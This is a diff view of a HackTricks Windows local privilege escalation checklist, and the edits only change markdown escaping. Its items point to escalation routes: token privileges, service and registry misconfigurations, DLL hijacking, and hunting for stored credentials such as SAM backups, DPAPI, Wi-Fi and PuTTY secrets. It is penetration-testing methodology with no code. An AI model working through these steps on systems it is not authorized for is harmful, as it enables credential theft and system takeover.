### ****[**User Privileges**](windows-local-privilege-escalation/#users-and-groups) ### \*\*\*\*[**User Privileges**](windows-local-privilege-escalation/#users-and-groups)
* [ ] Check [**current** user **privileges**](windows-local-privilege-escalation/#users-and-groups)**** * [ ] Check [**current** user **privileges**](windows-local-privilege-escalation/#users-and-groups)\*\*\*\*
* [ ] Are you [**member of any privileged group**](windows-local-privilege-escalation/#privileged-groups)? * [ ] Are you [**member of any privileged group**](windows-local-privilege-escalation/#privileged-groups)?
* [ ] Check if you have [any of these tokens enabled](windows-local-privilege-escalation/#token-manipulation): **SeImpersonatePrivilege, SeAssignPrimaryPrivilege, SeTcbPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeCreateTokenPrivilege, SeLoadDriverPrivilege, SeTakeOwnershipPrivilege, SeDebugPrivilege** ?&#x20; * [ ] Check if you have [any of these tokens enabled](windows-local-privilege-escalation/#token-manipulation): **SeImpersonatePrivilege, SeAssignPrimaryPrivilege, SeTcbPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeCreateTokenPrivilege, SeLoadDriverPrivilege, SeTakeOwnershipPrivilege, SeDebugPrivilege** ?
* [ ] [**Users Sessions**](windows-local-privilege-escalation/#logged-users-sessions)? * [ ] [**Users Sessions**](windows-local-privilege-escalation/#logged-users-sessions)?
* [ ] Check[ **users homes**](windows-local-privilege-escalation/#home-folders) (access?) * [ ] Check[ **users homes**](windows-local-privilege-escalation/#home-folders) (access?)
* [ ] Check [**Password Policy**](windows-local-privilege-escalation/#password-policy)**** * [ ] Check [**Password Policy**](windows-local-privilege-escalation/#password-policy)\*\*\*\*
* [ ] What is[ **inside the Clipboard**](windows-local-privilege-escalation/#get-the-content-of-the-clipboard)? * [ ] What is[ **inside the Clipboard**](windows-local-privilege-escalation/#get-the-content-of-the-clipboard)?
### [Network](windows-local-privilege-escalation/#network) ### [Network](windows-local-privilege-escalation/#network)
* [ ] Check **current** [**network** **information**](windows-local-privilege-escalation/#network)**** * [ ] Check **current** [**network** **information**](windows-local-privilege-escalation/#network)\*\*\*\*
* [ ] Check **hidden local services** restricted to the outside * [ ] Check **hidden local services** restricted to the outside
### [Running Processes](windows-local-privilege-escalation/#running-processes) ### [Running Processes](windows-local-privilege-escalation/#running-processes)
* [ ] Processes binaries [**file and folders permissions**](windows-local-privilege-escalation/#file-and-folder-permissions)**** * [ ] Processes binaries [**file and folders permissions**](windows-local-privilege-escalation/#file-and-folder-permissions)\*\*\*\*
* [ ] ****[**Memory Password mining**](windows-local-privilege-escalation/#memory-password-mining)**** * [ ] [**Memory Password mining**](windows-local-privilege-escalation/#memory-password-mining)
* [ ] ****[**Insecure GUI apps**](windows-local-privilege-escalation/#insecure-gui-apps)**** * [ ] [**Insecure GUI apps**](windows-local-privilege-escalation/#insecure-gui-apps)
### [Services](windows-local-privilege-escalation/#services) ### [Services](windows-local-privilege-escalation/#services)
@ -63,11 +63,11 @@ If you want to **share some tricks with the community** you can also submit **pu
* [ ] [Can you **modify** the **registry** of any **service**?](windows-local-privilege-escalation/#services-registry-permissions) * [ ] [Can you **modify** the **registry** of any **service**?](windows-local-privilege-escalation/#services-registry-permissions)
* [ ] [Can you take advantage of any **unquoted service** binary **path**?](windows-local-privilege-escalation/#unquoted-service-paths) * [ ] [Can you take advantage of any **unquoted service** binary **path**?](windows-local-privilege-escalation/#unquoted-service-paths)
### ****[**Applications**](windows-local-privilege-escalation/#applications)**** ### [**Applications**](windows-local-privilege-escalation/#applications)
* [ ] **Write** [**permissions on installed applications**](windows-local-privilege-escalation/#write-permissions)**** * [ ] **Write** [**permissions on installed applications**](windows-local-privilege-escalation/#write-permissions)\*\*\*\*
* [ ] ****[**Startup Applications**](windows-local-privilege-escalation/#run-at-startup)**** * [ ] [**Startup Applications**](windows-local-privilege-escalation/#run-at-startup)
* [ ] **Vulnerable** [**Drivers**](windows-local-privilege-escalation/#drivers)**** * [ ] **Vulnerable** [**Drivers**](windows-local-privilege-escalation/#drivers)\*\*\*\*
### [DLL Hijacking](windows-local-privilege-escalation/#path-dll-hijacking) ### [DLL Hijacking](windows-local-privilege-escalation/#path-dll-hijacking)
@ -82,7 +82,7 @@ If you want to **share some tricks with the community** you can also submit **pu
### [Windows Credentials](windows-local-privilege-escalation/#windows-credentials) ### [Windows Credentials](windows-local-privilege-escalation/#windows-credentials)
* [ ] ****[**Winlogon** ](windows-local-privilege-escalation/#winlogon-credentials)credentials * [ ] \*\*\*\*[**Winlogon** ](windows-local-privilege-escalation/#winlogon-credentials)credentials
* [ ] [**Windows Vault**](windows-local-privilege-escalation/#windows-vault) credentials that you could use? * [ ] [**Windows Vault**](windows-local-privilege-escalation/#windows-vault) credentials that you could use?
* [ ] Interesting [**DPAPI credentials**](windows-local-privilege-escalation/#dpapi)? * [ ] Interesting [**DPAPI credentials**](windows-local-privilege-escalation/#dpapi)?
* [ ] Passwords of saved [**Wifi networks**](windows-local-privilege-escalation/#wifi)? * [ ] Passwords of saved [**Wifi networks**](windows-local-privilege-escalation/#wifi)?
@ -94,21 +94,21 @@ If you want to **share some tricks with the community** you can also submit **pu
### [Files and Registry (Credentials)](windows-local-privilege-escalation/#files-and-registry-credentials) ### [Files and Registry (Credentials)](windows-local-privilege-escalation/#files-and-registry-credentials)
* [ ] **Putty:** [**Creds**](windows-local-privilege-escalation/#putty-creds) **and** [**SSH host keys**](windows-local-privilege-escalation/#putty-ssh-host-keys)**** * [ ] **Putty:** [**Creds**](windows-local-privilege-escalation/#putty-creds) **and** [**SSH host keys**](windows-local-privilege-escalation/#putty-ssh-host-keys)\*\*\*\*
* [ ] ****[**SSH keys in registry**](windows-local-privilege-escalation/#ssh-keys-in-registry)? * [ ] \*\*\*\*[**SSH keys in registry**](windows-local-privilege-escalation/#ssh-keys-in-registry)?
* [ ] Passwords in [**unattended files**](windows-local-privilege-escalation/#unattended-files)? * [ ] Passwords in [**unattended files**](windows-local-privilege-escalation/#unattended-files)?
* [ ] Any [**SAM & SYSTEM**](windows-local-privilege-escalation/#sam-and-system-backups) backup? * [ ] Any [**SAM & SYSTEM**](windows-local-privilege-escalation/#sam-and-system-backups) backup?
* [ ] [**Cloud credentials**](windows-local-privilege-escalation/#cloud-credentials)? * [ ] [**Cloud credentials**](windows-local-privilege-escalation/#cloud-credentials)?
* [ ] ****[**McAfee SiteList.xml**](windows-local-privilege-escalation/#mcafee-sitelist-xml) file? * [ ] \*\*\*\*[**McAfee SiteList.xml**](windows-local-privilege-escalation/#mcafee-sitelist-xml) file?
* [ ] ****[**Cached GPP Password**](windows-local-privilege-escalation/#cached-gpp-pasword)? * [ ] \*\*\*\*[**Cached GPP Password**](windows-local-privilege-escalation/#cached-gpp-pasword)?
* [ ] Password in [**IIS Web config file**](windows-local-privilege-escalation/#iis-web-config)? * [ ] Password in [**IIS Web config file**](windows-local-privilege-escalation/#iis-web-config)?
* [ ] Interesting info in [**web** **logs**](windows-local-privilege-escalation/#logs)? * [ ] Interesting info in [**web** **logs**](windows-local-privilege-escalation/#logs)?
* [ ] Do you want to [**ask for credentials**](windows-local-privilege-escalation/#ask-for-credentials) to the user? * [ ] Do you want to [**ask for credentials**](windows-local-privilege-escalation/#ask-for-credentials) to the user?
* [ ] Interesting [**files inside the Recycle Bin**](windows-local-privilege-escalation/#credentials-in-the-recyclebin)? * [ ] Interesting [**files inside the Recycle Bin**](windows-local-privilege-escalation/#credentials-in-the-recyclebin)?
* [ ] Other [**registry containing credentials**](windows-local-privilege-escalation/#inside-the-registry)? * [ ] Other [**registry containing credentials**](windows-local-privilege-escalation/#inside-the-registry)?
* [ ] Inside [**Browser data**](windows-local-privilege-escalation/#browsers-history) (dbs, history, bookmarks....)? * [ ] Inside [**Browser data**](windows-local-privilege-escalation/#browsers-history) (dbs, history, bookmarks....)?
* [ ] ****[**Generic password search**](windows-local-privilege-escalation/#generic-password-search-in-files-and-registry) in files and registry * [ ] \*\*\*\*[**Generic password search**](windows-local-privilege-escalation/#generic-password-search-in-files-and-registry) in files and registry
* [ ] ****[**Tools**](windows-local-privilege-escalation/#tools-that-search-for-passwords) to automatically search for passwords * [ ] \*\*\*\*[**Tools**](windows-local-privilege-escalation/#tools-that-search-for-passwords) to automatically search for passwords
### [Leaked Handlers](windows-local-privilege-escalation/#leaked-handlers) ### [Leaked Handlers](windows-local-privilege-escalation/#leaked-handlers)
@ -120,12 +120,10 @@ If you want to **share some tricks with the community** you can also submit **pu
### And more... ### And more...
If you want to **know** about my **latest modifications**/**additions** or you have **any suggestion for HackTricks or PEASS**, join the [💬](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass), or **follow me on Twitter** [🐦](https://emojipedia.org/bird/)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**\ If you want to **know** about my **latest modifications**/**additions** or you have **any suggestion for HackTricks or PEASS**, join the [💬](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass), or **follow me on Twitter** [🐦](https://emojipedia.org/bird/)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**\
****If you want to **share some tricks with the community** you can also submit **pull requests** to [**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) that will be reflected in this book.\ \*\*\*\*If you want to **share some tricks with the community** you can also submit **pull requests** to [**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) that will be reflected in this book.\
Don't forget to **give ⭐ on the github** to motivate me to continue developing this book. Don't forget to **give ⭐ on the github** to motivate me to continue developing this book.
![](<../.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (4).png>) ![](<../.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (4).png>)
[**Buy me a coffee here**](https://www.buymeacoffee.com/carlospolop)**** [**Buy me a coffee here**](https://www.buymeacoffee.com/carlospolop)\*\*\*\*